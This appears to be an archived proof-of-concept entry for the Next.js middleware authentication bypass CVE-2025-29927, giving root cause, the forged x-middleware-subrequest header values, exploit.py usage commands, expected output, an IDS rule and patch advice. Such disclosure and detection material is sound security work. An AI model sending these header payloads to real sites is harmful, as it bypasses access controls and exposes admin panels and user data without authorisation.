Next.js Corrupt Middleware Auth Bypass (CVE-2025-29927)
by phoscoder · 2026-05-15
- Severity
- Critical
- CVE
- CVE-2025-29927
- Category
- web
- Affected product
- Next.js (Vercel)
- Affected versions
- 11.1.4 and later; fixed in 15.2.3, 14.2.25, 13.5.9, 12.3.5
- Disclosed
- 2026-05-15
- Patch status
- patched
References
Archive entry
intelseclab/poc-archiveMetadata
| Field | Value |
|---|---|
| Date Added | 2026-05-15 |
| Author / Researcher | phoscoder |
| CVE / Advisory | CVE-2025-29927 |
| Category | web |
| Severity | Critical |
| CVSS Score | 9.1 (CVSSv3) |
| Status | Weaponized |
| Tags | auth-bypass, middleware-bypass, Next.js, unauthenticated, header-injection |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Next.js (Vercel) |
| Versions Affected | 11.1.4 and later; fixed in 15.2.3, 14.2.25, 13.5.9, 12.3.5 |
| Language / Platform | JavaScript / Node.js |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2025-29927 is a critical authentication bypass in Next.js middleware. By sending a crafted x-middleware-subrequest HTTP header, an unauthenticated remote attacker can cause the Next.js middleware layer to skip execution entirely — bypassing authentication guards, redirect logic, and any other security controls implemented in middleware. This affects all Next.js applications that rely on middleware for access control and is exploitable against any publicly reachable Next.js server running a vulnerable version.
Vulnerability Details
Root Cause
Next.js middleware uses an internal header x-middleware-subrequest to track recursive sub-requests and prevent infinite middleware loops. When this header is present and its value matches the middleware module path (e.g. middleware or src/middleware), the framework short-circuits and skips middleware execution without running any of the handler code. Because the header is not stripped from incoming external requests before the middleware check, an attacker can trivially forge it. Prior to version 12.2, the relevant path was pages/_middleware; from 12.2 onward it is middleware or src/middleware. Recent versions also accept colon-separated repeated values (e.g. middleware:middleware:middleware:middleware:middleware) as a recursive depth guard, all of which are equally exploitable.
Attack Vector
An unauthenticated attacker sends a standard HTTP GET request to a protected path (e.g. /admin) on the target Next.js application, adding the header:
x-middleware-subrequest: middleware
Multiple payload variants must be tried to cover different Next.js versions and project layouts. No authentication, session, or prior knowledge of the application is required beyond the protected URL.
Impact
Complete bypass of all Next.js middleware-enforced access controls. An attacker can access any route that is protected only via middleware — including admin panels, authenticated APIs, and user dashboards — without valid credentials. Depending on the application, this may lead to sensitive data exposure, privilege escalation, account takeover, or full administrative access.
Environment / Lab Setup
OS: Any (Linux, macOS, Windows)
Target: Any publicly reachable Next.js application running version 11.1.4 – 15.2.2 /
14.0.0 – 14.2.24 / 13.x < 13.5.9 / 12.x < 12.3.5
Attacker: Any host with Python 3 and network access to the target
Tools: Python 3, requests library
Setup Steps
| |
Proof of Concept
Step-by-Step Reproduction
Identify a Next.js target — confirm the site runs Next.js (check
x-powered-by: Next.jsresponse header or/_next/static assets).Run the scanner against a protected path — the tool iterates through all known payload variants automatically.
1python exploit.py https://target.example.com /adminInspect results — if the response status code is 2xx and the final URL does not redirect to a login/register page, the site is likely vulnerable.
1python exploit.py https://target.example.com /admin --verbose --show-headersConfirm bypass — a direct request without the header should redirect (302) to a login page; a request with the bypass header should return the protected page directly (200).
Exploit Code
See
exploit.pyin this folder.
| |
Expected Output
🕵️ Checking https://target.example.com for Next.js Middleware Vulnerability (CVE-2025-29927)
🔍 Tested payload: middleware
Status Code: 200
Accessed URL: https://target.example.com/admin
✅ Status code 200 is a success code
❌ login Path not found in URL: https://target.example.com/admin
❌ register Path not found in URL: https://target.example.com/admin
🚨 POTENTIAL VULNERABILITY DETECTED with payload: middleware
The site might be vulnerable to middleware bypass!
Screenshots / Evidence
screenshots/— add evidence of successful exploitation here
Detection & Indicators of Compromise
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
SIEM / IDS Rule (example):
alert http any any -> $HTTP_SERVERS any (
msg:"Next.js CVE-2025-29927 middleware bypass attempt";
content:"x-middleware-subrequest"; http_header;
sid:9000010; rev:1;
)
Remediation
| Action | Detail |
|---|---|
| Patch | Upgrade Next.js to 15.2.3, 14.2.25, 13.5.9, or 12.3.5 (whichever matches your major version) |
| Workaround | Strip the x-middleware-subrequest header at your reverse proxy / CDN / WAF before it reaches the Next.js application |
| Config Hardening | Enforce authentication at the application layer (API route or server-side) in addition to middleware; do not rely solely on middleware for access control |
References
- CVE-2025-29927 — NVD
- Next.js and the corrupt middleware: the authorizing artifact — zhero-web-sec
- Vercel / Next.js Security Advisory
- Source Repository — phoscoder/ghost-route
Notes
Auto-ingested from https://github.com/phoscoder/ghost-route on 2026-05-15.
Original research credited to Rachid A. (@zhero___) and Yasser Allam (@inzo____). The vulnerability is fully patched in the versions listed above; however, any application running an older version and relying exclusively on middleware for route protection remains at risk until upgraded.
| |